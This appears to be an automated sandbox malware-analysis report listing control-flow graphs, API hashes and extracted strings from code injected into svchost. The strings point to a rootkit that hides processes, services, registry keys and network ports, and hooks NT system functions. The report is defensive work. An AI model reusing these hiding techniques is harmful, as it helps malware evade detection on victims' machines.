14059->14063 14061 26a879c1585 StrCmpIW 14060->14061 14062 26a879c158d StrCmpW 14060->14062 14060->14063 14061->14060 14062->14060 14063->14051 14064 26a87992908 14066 26a87992936 14064->14066 14065 26a87992a2b LoadLibraryA 14065->14066 14066->14065 14067 26a87992aa7 14066->14067

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2930009936.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a879c0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                • API String ID: 106492572-2879589442
                                                • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                • Instruction ID: 139f86e9f2346f244d1dd68c2d1ec8f696824a443f106ae828e44e4b72836a90
                                                • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                • Instruction Fuzzy Hash: C7711676210A50D6FB90DF62E89869D3FB4FB88B89F405111DE4D63B28EF3AC444CB05

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2930009936.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a879c0000_svchost.jbxd
                                                Similarity
                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                • String ID:
                                                • API String ID: 1683269324-0
                                                • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                • Instruction ID: 88cb58427b91c04fa6504016e21a9484d774a83945d8fb86de941a3f11605e71
                                                • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                • Instruction Fuzzy Hash: C5115B7061060182FFE1D725B94E35D7E90A7D8745F4440259A0EAB1E4EF3BC0849E43

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 0000026A879C1650: GetProcessHeap.KERNEL32 ref: 0000026A879C165B
                                                  • Part of subcall function 0000026A879C1650: HeapAlloc.KERNEL32 ref: 0000026A879C166A
                                                  • Part of subcall function 0000026A879C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C16DA
                                                  • Part of subcall function 0000026A879C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C1707
                                                  • Part of subcall function 0000026A879C1650: RegCloseKey.ADVAPI32 ref: 0000026A879C1721
                                                  • Part of subcall function 0000026A879C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C1741
                                                  • Part of subcall function 0000026A879C1650: RegCloseKey.ADVAPI32 ref: 0000026A879C175C
                                                  • Part of subcall function 0000026A879C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C177C
                                                  • Part of subcall function 0000026A879C1650: RegCloseKey.ADVAPI32 ref: 0000026A879C1797
                                                  • Part of subcall function 0000026A879C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C17B7
                                                  • Part of subcall function 0000026A879C1650: RegCloseKey.ADVAPI32 ref: 0000026A879C17D2
                                                  • Part of subcall function 0000026A879C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C17F2
                                                • Sleep.KERNEL32 ref: 0000026A879C1C43
                                                • SleepEx.KERNEL32 ref: 0000026A879C1C49
                                                  • Part of subcall function 0000026A879C1650: RegCloseKey.ADVAPI32 ref: 0000026A879C180D
                                                  • Part of subcall function 0000026A879C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C182D
                                                  • Part of subcall function 0000026A879C1650: RegCloseKey.ADVAPI32 ref: 0000026A879C1848
                                                  • Part of subcall function 0000026A879C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C1868
                                                  • Part of subcall function 0000026A879C1650: RegCloseKey.ADVAPI32 ref: 0000026A879C1883
                                                  • Part of subcall function 0000026A879C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C18A3
                                                  • Part of subcall function 0000026A879C1650: RegCloseKey.ADVAPI32 ref: 0000026A879C18BE
                                                  • Part of subcall function 0000026A879C1650: RegCloseKey.ADVAPI32 ref: 0000026A879C18C8
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2930009936.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a879c0000_svchost.jbxd
                                                Similarity
                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                • String ID:
                                                • API String ID: 1534210851-0
                                                • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                • Instruction ID: 131ff0a4b7b3627bec86245eef0d9013fb3dd59f5e4ba82e029a9078f8b5bc32
                                                • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                • Instruction Fuzzy Hash: 183130B5280A0191FFD09F36DA4935E37A4ABC4BD0F544021DE0DA76EAFF22C850CB56

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 108 26a87992908-26a87992973 call 26a87990f34 * 4 117 26a87992979-26a8799297c 108->117 118 26a87992b8b 108->118 117->118 120 26a87992982-26a87992985 117->120 119 26a87992b8d-26a87992ba9 118->119 120->118 121 26a8799298b-26a8799298e 120->121 121->118 122 26a87992994-26a879929b2 121->122 122->118 124 26a879929b8-26a879929dc call 26a87990d6c 122->124 127 26a87992a0b-26a87992a12 124->127 128 26a879929de-26a87992a09 call 26a87990d6c 124->128 130 26a87992ab2-26a87992ab9 127->130 131 26a87992a18-26a87992a25 127->131 128->127 132 26a87992b6c-26a87992b89 130->132 133 26a87992abf-26a87992ad6 130->133 131->130 135 26a87992a2b-26a87992a39 LoadLibraryA 131->135 132->119 133->132 136 26a87992adc 133->136 137 26a87992a3b-26a87992a45 135->137 138 26a87992a9d-26a87992aa5 135->138 140 26a87992ae2-26a87992af7 136->140 141 26a87992a48-26a87992a4c 137->141 138->135 142 26a87992aa7-26a87992aac 138->142 143 26a87992af9-26a87992b0a 140->143 144 26a87992b5b-26a87992b66 140->144 145 26a87992a9a 141->145 146 26a87992a4e-26a87992a52 141->146 142->130 148 26a87992b15-26a87992b19 143->148 149 26a87992b0c-26a87992b13 143->149 144->132 144->140 145->138 150 26a87992a54-26a87992a7b 146->150 151 26a87992a7d-26a87992a87 146->151 153 26a87992b24-26a87992b28 148->153 154 26a87992b1b-26a87992b22 148->154 152 26a87992b48-26a87992b59 149->152 155 26a87992a8d-26a87992a98 150->155 151->155 152->143 152->144 156 26a87992b3a-26a87992b3e 153->156 157 26a87992b2a-26a87992b38 153->157 154->152 155->141 156->152 158 26a87992b40-26a87992b43 156->158 157->152 158->152
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2929010361.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a87990000_svchost.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                • Instruction ID: 218ec7520d977380068f2feaa711e4e0a9d54bee7078138da19b5574add95528
                                                • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                • Instruction Fuzzy Hash: 6161023270265187FFA8CF19D49876DB3D1FB48BA4F548025DA29177C5DB3AE892CB02

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 203 26a879c2cdc-26a879c2d55 call 26a879decc0 206 26a879c3090-26a879c30b3 203->206 207 26a879c2d5b-26a879c2d61 203->207 207->206 208 26a879c2d67-26a879c2d6a 207->208 208->206 209 26a879c2d70-26a879c2d73 208->209 209->206 210 26a879c2d79-26a879c2d89 GetModuleHandleA 209->210 211 26a879c2d8b-26a879c2d9b call 26a879d3090 210->211 212 26a879c2d9d 210->212 214 26a879c2da0-26a879c2dbe 211->214 212->214 214->206 217 26a879c2dc4-26a879c2de3 StrCmpNIW 214->217 217->206 218 26a879c2de9-26a879c2ded 217->218 218->206 219 26a879c2df3-26a879c2dfd 218->219 219->206 220 26a879c2e03-26a879c2e0a 219->220 220->206 221 26a879c2e10-26a879c2e23 220->221 222 26a879c2e33 221->222 223 26a879c2e25-26a879c2e31 221->223 224 26a879c2e36-26a879c2e3a 222->224 223->224 225 26a879c2e4a 224->225 226 26a879c2e3c-26a879c2e48 224->226 227 26a879c2e4d-26a879c2e57 225->227 226->227 228 26a879c2f4d-26a879c2f51 227->228 229 26a879c2e5d-26a879c2e60 227->229 230 26a879c2f57-26a879c2f5a 228->230 231 26a879c3082-26a879c308a 228->231 232 26a879c2e72-26a879c2e7c 229->232 233 26a879c2e62-26a879c2e6f call 26a879c1a14 229->233 236 26a879c2f6b-26a879c2f75 230->236 237 26a879c2f5c-26a879c2f68 call 26a879c1a14 230->237 231->206 231->221 234 26a879c2e7e-26a879c2e8b 232->234 235 26a879c2eb0-26a879c2eba 232->235 233->232 234->235 239 26a879c2e8d-26a879c2e9a 234->239 240 26a879c2eea-26a879c2eed 235->240 241 26a879c2ebc-26a879c2ec9 235->241 243 26a879c2f77-26a879c2f84 236->243 244 26a879c2fa5-26a879c2fa8 236->244 237->236 248 26a879c2e9d-26a879c2ea3 239->248 250 26a879c2eef-26a879c2ef9 call 26a879c1d28 240->250 251 26a879c2efb-26a879c2f08 lstrlenW 240->251 241->240 249 26a879c2ecb-26a879c2ed8 241->249 243->244 253 26a879c2f86-26a879c2f93 243->253 246 26a879c2fb5-26a879c2fc2 lstrlenW 244->246 247 26a879c2faa-26a879c2fb3 call 26a879c1d28 244->247 257 26a879c2fc4-26a879c2fce 246->257 258 26a879c2fe5-26a879c2fef call 26a879c3930 246->258 247->246 273 26a879c2ffa-26a879c3005 247->273 255 26a879c2ea9-26a879c2eae 248->255 256 26a879c2f43-26a879c2f48 248->256 259 26a879c2edb-26a879c2ee1 249->259 250->251 250->256 261 26a879c2f0a-26a879c2f14 251->261 262 26a879c2f2b-26a879c2f3d call 26a879c3930 251->262 263 26a879c2f96-26a879c2f9c 253->263 255->235 255->248 266 26a879c2ff2-26a879c2ff4 256->266 257->258 267 26a879c2fd0-26a879c2fe3 call 26a879c1554 257->267 258->266 259->256 268 26a879c2ee3-26a879c2ee8 259->268 261->262 271 26a879c2f16-26a879c2f29 call 26a879c1554 261->271 262->256 262->266 272 26a879c2f9e-26a879c2fa3 263->272 263->273 266->231 266->273 267->258 267->273 268->240 268->259 271->256 271->262 272->244 272->263 278 26a879c3007-26a879c300b 273->278 279 26a879c307c-26a879c3080 273->279 282 26a879c3013-26a879c302d call 26a879c86a0 278->282 283 26a879c300d-26a879c3011 278->283 279->231 284 26a879c3030-26a879c3033 282->284 283->282 283->284 287 26a879c3056-26a879c3059 284->287 288 26a879c3035-26a879c3053 call 26a879c86a0 284->288 287->279 290 26a879c305b-26a879c3079 call 26a879c86a0 287->290 288->287 290->279
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2930009936.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a879c0000_svchost.jbxd
                                                Similarity
                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                • API String ID: 2119608203-3850299575
                                                • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                • Instruction ID: 6cffb3e72637f80e0ecca6e5675cb6c27de45b81606dbc8799dcaebf2915ee0d
                                                • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                • Instruction Fuzzy Hash: 87B17A72210A9482EFA9DF29C4487AD77A8FB84B84F545016EE0D63794EF36C980CB42

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2930009936.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a879c0000_svchost.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                • String ID:
                                                • API String ID: 3140674995-0
                                                • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                • Instruction ID: 4a68258971deacf93967bbbabd61e0263a25abfb71767530d944726e65d9e7da
                                                • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                • Instruction Fuzzy Hash: 81314D72205B80DAEBA0DF61E8847ED7BA4F784744F44442ADB4E57B98EF39C648CB11
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2930009936.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a879c0000_svchost.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                • String ID:
                                                • API String ID: 1239891234-0
                                                • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                • Instruction ID: c019a3b977e98c8464a9c7ca51686cb19ca29057d0f9f7fa7f0392543fb84b7f
                                                • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                • Instruction Fuzzy Hash: 7B318036214F8086EBA0CF25E84439E7BA4F788758F540116EB9D53BA8EF39C645CF01
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2930009936.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a879c0000_svchost.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite$ConsoleOutput
                                                • String ID:
                                                • API String ID: 1443284424-0
                                                • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                • Instruction ID: e50ab53f46f43525feb9fc316cfef71cb17cf2ffafe6bbfab154a7f387decc61
                                                • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                • Instruction Fuzzy Hash: 2FE11132B04B809AE740CF68D5882DD7FB1F385788F148156DF5E67B99DA39C51ACB01

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2930009936.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a879c0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                • String ID: d
                                                • API String ID: 2005889112-2564639436
                                                • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                • Instruction ID: 450101e3417238312508fb76fbecef92d95677056d9534776bb621f83f8ed32d
                                                • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                • Instruction Fuzzy Hash: 645179B2204B85D3FB94CF62E54839EBBA1F788B81F048124DA8D17B14EF39C066CB41

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2930009936.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a879c0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                • API String ID: 4175298099-1975688563
                                                • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                • Instruction ID: 8066ad8183acf5b913f5b97166315d822d90824d6080871f6ca517cb64a4b855
                                                • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                • Instruction Fuzzy Hash: DD31D274200A4AA4FF84EFA9EC597DC3F22F784744FC055239409331759E7ACA99DB92

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2930009936.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a879c0000_svchost.jbxd
                                                Similarity
                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                • API String ID: 2171963597-1373409510
                                                • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                • Instruction ID: 13b7611704c3c36f7f6880a0d3d83849d3e33de2f891407fa32e3e8a6b9eb749
                                                • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                • Instruction Fuzzy Hash: B0215736614A4083FB50CB25E40836E7FA1F389BA5F504215EA5D17AA8CF3EC189CF02

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2930009936.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a879c0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                • String ID: d
                                                • API String ID: 3743429067-2564639436
                                                • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                • Instruction ID: 5301be5536c62eb723cdb2ab7e8a703766583fcf04a52a5b40df69596fb488ec
                                                • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                • Instruction Fuzzy Hash: A4418073214B80D7EBA0CF62E44879EBBA1F389B85F008125DB8917B54EF39D165CB04

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 318 26a879969f0-26a879969f6 319 26a879969f8-26a879969fb 318->319 320 26a87996a31-26a87996a3b 318->320 321 26a87996a25-26a87996a64 call 26a879970a0 319->321 322 26a879969fd-26a87996a00 319->322 323 26a87996b58-26a87996b6d 320->323 338 26a87996b32 321->338 339 26a87996a6a-26a87996a7f call 26a87996f34 321->339 324 26a87996a02-26a87996a05 322->324 325 26a87996a18 __scrt_dllmain_crt_thread_attach 322->325 326 26a87996b7c-26a87996b96 call 26a87996f34 323->326 327 26a87996b6f 323->327 329 26a87996a07-26a87996a10 324->329 330 26a87996a11-26a87996a16 call 26a87996fe4 324->330 333 26a87996a1d-26a87996a24 325->333 341 26a87996b98-26a87996bcd call 26a8799705c call 26a87996efc call 26a879973f8 call 26a87997210 call 26a87997234 call 26a8799708c 326->341 342 26a87996bcf-26a87996c00 call 26a87997270 326->342 331 26a87996b71-26a87996b7b 327->331 330->333 343 26a87996b34-26a87996b49 338->343 350 26a87996a85-26a87996a96 call 26a87996fa4 339->350 351 26a87996b4a-26a87996b57 call 26a87997270 339->351 341->331 352 26a87996c02-26a87996c08 342->352 353 26a87996c11-26a87996c17 342->353 370 26a87996ae7-26a87996af1 call 26a87997210 350->370 371 26a87996a98-26a87996abc call 26a879973bc call 26a87996eec call 26a87996f18 call 26a879990dc 350->371 351->323 352->353 357 26a87996c0a-26a87996c0c 352->357 358 26a87996c19-26a87996c23 353->358 359 26a87996c5e-26a87996c74 call 26a87992858 353->359 364 26a87996cff-26a87996d0c 357->364 365 26a87996c25-26a87996c2d 358->365 366 26a87996c2f-26a87996c3d call 26a879a2758 358->366 379 26a87996c76-26a87996c78 359->379 380 26a87996cac-26a87996cae 359->380 373 26a87996c43-26a87996c58 call 26a879969f0 365->373 366->373 383 26a87996cf5-26a87996cfd 366->383 370->338 391 26a87996af3-26a87996aff call 26a87997260 370->391 371->370 421 26a87996abe-26a87996ac5 __scrt_dllmain_after_initialize_c 371->421 373->359 373->383 379->380 388 26a87996c7a-26a87996c9c call 26a87992858 call 26a87996b58 379->388 381 26a87996cb5-26a87996cca call 26a879969f0 380->381 382 26a87996cb0-26a87996cb3 380->382 381->383 400 26a87996ccc-26a87996cd6 381->400 382->381 382->383 383->364 388->380 415 26a87996c9e-26a87996ca6 call 26a879a2758 388->415 408 26a87996b25-26a87996b30 391->408 409 26a87996b01-26a87996b0b call 26a87997178 391->409 405 26a87996cd8-26a87996cdf 400->405 406 26a87996ce1-26a87996cf1 call 26a879a2758 400->406 405->383 406->383 408->343 409->408 420 26a87996b0d-26a87996b1b 409->420 415->380 420->408 421->370 422 26a87996ac7-26a87996ae4 call 26a87999078 421->422 422->370
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2929010361.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a87990000_svchost.jbxd
                                                Similarity
                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                • String ID:
                                                • API String ID: 190073905-0
                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction ID: d9f4358a1d31489f216a376bbd794669f2cb2f33805e6d499db2f45a2d4a1307
                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction Fuzzy Hash: 2781F73170524186FBD0AB69984D79D72E0E797780F184025AA0977796EF3BC9868F03

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 425 26a879c75f0-26a879c75f6 426 26a879c75f8-26a879c75fb 425->426 427 26a879c7631-26a879c763b 425->427 428 26a879c7625-26a879c7664 call 26a879c7ca0 426->428 429 26a879c75fd-26a879c7600 426->429 430 26a879c7758-26a879c776d 427->430 448 26a879c7732 428->448 449 26a879c766a-26a879c767f call 26a879c7b34 428->449 431 26a879c7618 __scrt_dllmain_crt_thread_attach 429->431 432 26a879c7602-26a879c7605 429->432 433 26a879c776f 430->433 434 26a879c777c-26a879c7796 call 26a879c7b34 430->434 440 26a879c761d-26a879c7624 431->440 436 26a879c7607-26a879c7610 432->436 437 26a879c7611-26a879c7616 call 26a879c7be4 432->437 438 26a879c7771-26a879c777b 433->438 446 26a879c7798-26a879c77cd call 26a879c7c5c call 26a879c7afc call 26a879c7ff8 call 26a879c7e10 call 26a879c7e34 call 26a879c7c8c 434->446 447 26a879c77cf-26a879c7800 call 26a879c7e70 434->447 437->440 446->438 459 26a879c7802-26a879c7808 447->459 460 26a879c7811-26a879c7817 447->460 453 26a879c7734-26a879c7749 448->453 457 26a879c7685-26a879c7696 call 26a879c7ba4 449->457 458 26a879c774a-26a879c7757 call 26a879c7e70 449->458 475 26a879c76e7-26a879c76f1 call 26a879c7e10 457->475 476 26a879c7698-26a879c76bc call 26a879c7fbc call 26a879c7aec call 26a879c7b18 call 26a879c9cdc 457->476 458->430 459->460 464 26a879c780a-26a879c780c 459->464 465 26a879c7819-26a879c7823 460->465 466 26a879c785e-26a879c7874 call 26a879c3458 460->466 471 26a879c78ff-26a879c790c 464->471 472 26a879c7825-26a879c782d 465->472 473 26a879c782f-26a879c783d call 26a879d3358 465->473 486 26a879c7876-26a879c7878 466->486 487 26a879c78ac-26a879c78ae 466->487 478 26a879c7843-26a879c7858 call 26a879c75f0 472->478 473->478 490 26a879c78f5-26a879c78fd 473->490 475->448 498 26a879c76f3-26a879c76ff call 26a879c7e60 475->498 476->475 528 26a879c76be-26a879c76c5 __scrt_dllmain_after_initialize_c 476->528 478->466 478->490 486->487 495 26a879c787a-26a879c789c call 26a879c3458 call 26a879c7758 486->495 488 26a879c78b5-26a879c78ca call 26a879c75f0 487->488 489 26a879c78b0-26a879c78b3 487->489 488->490 507 26a879c78cc-26a879c78d6 488->507 489->488 489->490 490->471 495->487 522 26a879c789e-26a879c78a6 call 26a879d3358 495->522 515 26a879c7725-26a879c7730 498->515 516 26a879c7701-26a879c770b call 26a879c7d78 498->516 512 26a879c78d8-26a879c78df 507->512 513 26a879c78e1-26a879c78f1 call 26a879d3358 507->513 512->490 513->490 515->453 516->515 527 26a879c770d-26a879c771b 516->527 522->487 527->515 528->475 529 26a879c76c7-26a879c76e4 call 26a879c9c78 528->529 529->475
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2930009936.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a879c0000_svchost.jbxd
                                                Similarity
                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                • String ID:
                                                • API String ID: 190073905-0
                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction ID: e6e00d3cec3b77a6a90c9ec39f0c43c6408aef7a54a59689b67cb6274e0b0fd7
                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction Fuzzy Hash: FB81D13170464586FFD0EB2A998D39D7A94ABD5B80F4C8425AA0877796DB3BC8418F13

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 532 26a879c9804-26a879c9842 533 26a879c9848-26a879c984b 532->533 534 26a879c9933 532->534 535 26a879c9935-26a879c9951 533->535 536 26a879c9851 533->536 534->535 537 26a879c9854 536->537 538 26a879c985a-26a879c9869 537->538 539 26a879c992b 537->539 540 26a879c9876-26a879c9895 LoadLibraryExW 538->540 541 26a879c986b-26a879c986e 538->541 539->534 544 26a879c9897-26a879c98a0 call 26a879d3080 540->544 545 26a879c98ed-26a879c9902 540->545 542 26a879c9874 541->542 543 26a879c990d-26a879c991c call 26a879d3090 541->543 548 26a879c98e1-26a879c98e8 542->548 543->539 552 26a879c991e-26a879c9929 543->552 553 26a879c98a2-26a879c98b7 call 26a879cad28 544->553 554 26a879c98cf-26a879c98d9 544->554 545->543 546 26a879c9904-26a879c9907 FreeLibrary 545->546 546->543 548->537 552->535 553->554 557 26a879c98b9-26a879c98cd LoadLibraryExW 553->557 554->548 557->545 557->554
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2930009936.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a879c0000_svchost.jbxd
                                                Similarity
                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                • String ID: api-ms-
                                                • API String ID: 2559590344-2084034818
                                                • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                • Instruction ID: 46faaff618465698a6995b51eff2aa39a1bd3dd032481dc3d2b297d9d9beb68c
                                                • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                • Instruction Fuzzy Hash: CF31C131212A40D1FF92DB06E80879D77A8BB98BB4F5A4524ED2D2B394DF39C445CB02

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2930009936.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a879c0000_svchost.jbxd
                                                Similarity
                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                • String ID: CONOUT$
                                                • API String ID: 3230265001-3130406586
                                                • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                • Instruction ID: 195ee54b184dfd1d4a94bbabb291892d4747d69da2f14ea1dda46ef7d3bb7c40
                                                • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                • Instruction Fuzzy Hash: E211BC32314B4086F790CB12E84831DBEA4F789FE5F004225EA5D977A4DF3AC9048B41

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
